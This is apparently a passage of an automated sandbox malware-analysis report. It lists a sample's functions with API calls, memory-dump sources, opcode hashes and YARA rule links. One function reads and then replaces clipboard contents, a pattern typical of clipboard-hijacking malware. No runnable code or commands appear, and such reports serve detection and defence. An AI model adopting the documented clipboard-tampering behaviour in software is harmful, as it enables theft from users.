                                                                                                                                                                                                                                                                          • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                                                          • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                                                                                                                                                                                                                                          Function 02490E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000400,?,?,02490223,?,?), ref: 02490E19
                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,02490223,?,?), ref: 02490E1E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                          • Instruction ID: 222b95ba1efed397dc51e845e48fe434b558f4b478ecd050a5280b6dec76a593
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20D0123514512877DB002A94DC09BCE7F1CDF05B66F008011FB0DD9180C770954046E5
                                                                                                                                                                                                                                                                          Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                                                          • Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                                                                                                                                                                                                                                          Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __fread_nolock
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                          • Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                                                          • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                                                                                                                                                                                                                                          Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 323602529-0
                                                                                                                                                                                                                                                                          • Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                                                                                                                                                                                          • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                                                                                                                                                                                                                                          Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: H_prolog3_catch
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3886170330-0
                                                                                                                                                                                                                                                                          • Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                                                                                                                                                                                          • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
                                                                                                                                                                                                                                                                          Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __wsopen_s
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                          • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                                                          • Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
                                                                                                                                                                                                                                                                          Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                                                          • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                                                          • Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
                                                                                                                                                                                                                                                                          Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                          • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                                                          • Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
                                                                                                                                                                                                                                                                          Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2005118841-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                                                                                                                                                                                          • Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
                                                                                                                                                                                                                                                                          Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                                                          • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                                                                          • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                                                                                                                                                                                                          Function 00A0A14D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00A0A19E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3744559508.0000000000A09000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A09000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_a09000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                          • Instruction ID: f219fefe2dcc8f850f9e0a5d7c118e657287ea84b365b2a60dcec29fb858eee3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6113C79A00208EFDB01DF98CA85E98BBF5AF08350F058094F9489B362D371EA50EF81

                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                          Function 02491942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0249194D
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001541), ref: 02491957
                                                                                                                                                                                                                                                                            • Part of subcall function 0249CE77: _strlen.LIBCMT ref: 0249CE8E
                                                                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 02491984
                                                                                                                                                                                                                                                                          • GetClipboardData.USER32(00000001), ref: 02491994
                                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 024919B0
                                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 024919DF
                                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 02491B23
                                                                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 02491B39
                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000001), ref: 02491B46
                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 02491B70
                                                                                                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 02491B79
                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 02491B80
                                                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 02491BA4
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000002D2), ref: 02491BAF
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                                                          • String ID: 4#E$i
                                                                                                                                                                                                                                                                          • API String ID: 4246938166-2480119546
                                                                                                                                                                                                                                                                          • Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                                                                                                                                                                                          • Instruction ID: 63606adb81ef75338f9e99fff924674b777f75d393eb677b34fe5072a0c14ace
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47512630C00395DADB11DFA4ED55BED7B74FF2A306F04522AD809A2172EB709681CB69
                                                                                                                                                                                                                                                                          Function 02492361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0249239C
                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 024923B1
                                                                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 024923B8
                                                                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(00646464), ref: 024923CB
                                                                                                                                                                                                                                                                          • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024923EA
                                                                                                                                                                                                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0249240B
                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 02492416
                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000008,00000000), ref: 0249241F
                                                                                                                                                                                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02492443
                                                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 024924CE
                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 024924E6
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1529870607-0
                                                                                                                                                                                                                                                                          • Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                                                                                                                                                                                          • Instruction ID: ddf4940b38fe77233b829d96e5e93ea08edf75a94bad4dbe5da1f3de282c151b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2171FC72900228AFDB229F64DD85FAEBBBCEF09711F0041A5B509E6151DA70AF85CF20
                                                                                                                                                                                                                                                                          Function 0043D678 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                          • Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                                                                                                                                                                                          • Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45
                                                                                                                                                                                                                                                                          Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                          • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                          • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                                                                                                                                                                                                                                          Function 024CB9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024CBCF4,?,00000000), ref: 024CBA6E
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024CBCF4,?,00000000), ref: 024CBA97
                                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,024CBCF4,?,00000000), ref: 024CBAAC
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                          • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                          • Instruction ID: fe700fbc09080462cc1489e1ccd3d969674786d001abbddece9df515dcfa908c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F21773A600105AAD7748F5DD902BA777A6EB44E5CB66806EE989D7310F733DE81C350
                                                                                                                                                                                                                                                                          Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                                                                                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                                          • String ID:
